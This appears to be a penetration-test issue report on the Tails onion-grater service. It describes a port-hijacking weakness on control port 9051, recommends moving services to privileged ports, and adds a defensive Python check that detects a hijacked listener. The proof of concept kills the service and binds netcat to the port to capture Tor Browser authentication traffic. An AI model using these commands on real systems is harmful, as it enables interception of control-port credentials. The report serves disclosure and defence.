MITM of onion-grater service
https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/9
Description
Since the onion-grater service listens on a non-privileged port, a local user may be able to bind a socket to that port faster than the onion-grater service does. As a result, an attacker may be able to forge messages or leak information.
The following is an example (run as root), for demonstration purposes only:
POC
We see that the port is already bound by a PID:
amnesia@amnesia:~/$ sudo netstat -tulpen
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 0.0.0.0:9051 0.0.0.0:* LISTEN 0 20693 5297/python3
The port is bound by the /usr/local/lib/onion-grater application.
amnesia@amnesia:~/$ ps -aux | grep 5297
root 5297 0.5 0.4 656384 39748 ? Ssl Mar30 3:05 /usr/bin/python3 -u /usr/local/lib/onion-grater --listen-address 0.0.0.0
We kill the application as root and bind the port as the low-privileged amnesia user.
sudo kill -9 5297
nc -lvp 9051
We start the Tor Browser with /usr/local/lib/run-tor-browser-in-netns and get the following output:
Listening on 0.0.0.0 9051
Connection received on 10.200.1.2 53884
authenticate passwd
Patch
- Run all the services on privileged ports (ports below 1024, which only root can bind)
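A defender-side check for the condition described above, added here as an example and not part of the issue or of Tails: it parses /proc/net/tcp-style data and reports whether the LISTEN socket on the onion-grater port (9051, as in the netstat output above) is owned by root or by an unprivileged uid. The sample tables are constructed; only the port and inode 20693 come from the page.

```python
"""Report who owns the listener on the onion-grater control port (example check)."""

LISTEN = "0A"  # TCP state code for LISTEN in /proc/net/tcp


def parse_proc_net_tcp(text):
    """Yield (ip, port, state, uid, inode) for each row of /proc/net/tcp contents."""
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        local, state, uid, inode = fields[1], fields[3], int(fields[7]), int(fields[9])
        ip_hex, port_hex = local.split(":")
        # IPv4 address is stored as little-endian hex, so read the octets back to front
        octets = [int(ip_hex[i:i + 2], 16) for i in range(6, -1, -2)]
        yield ".".join(str(o) for o in octets), int(port_hex, 16), state, uid, inode


def listener_owner(text, port):
    """Return the uid owning the LISTEN socket on `port`, or None if nothing listens."""
    for _ip, p, state, uid, _inode in parse_proc_net_tcp(text):
        if p == port and state == LISTEN:
            return uid
    return None


def check_onion_grater_port(text, port=9051, expected_uid=0):
    """Return 'ok' (owned by expected uid), 'hijacked' (other uid) or 'absent'."""
    uid = listener_owner(text, port)
    if uid is None:
        return "absent"
    return "ok" if uid == expected_uid else "hijacked"


# Constructed sample tables (port 9051 == 0x235B); not captured from a real system.
HEADER = "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode"
ROOT_TABLE = "\n".join([HEADER,
    "   0: 00000000:235B 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20693 1 0 100 0 0 10 0"])
HIJACKED_TABLE = "\n".join([HEADER,
    "   0: 00000000:235B 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 31337 1 0 100 0 0 10 0"])
EMPTY_TABLE = "\n".join([HEADER,
    "   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0 100 0 0 10 0"])

if __name__ == "__main__":
    # On a live Linux host, read the real table (hypothetical usage; path is the kernel's).
    with open("/proc/net/tcp") as fh:
        print(check_onion_grater_port(fh.read()))
```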
Edited by intrigeri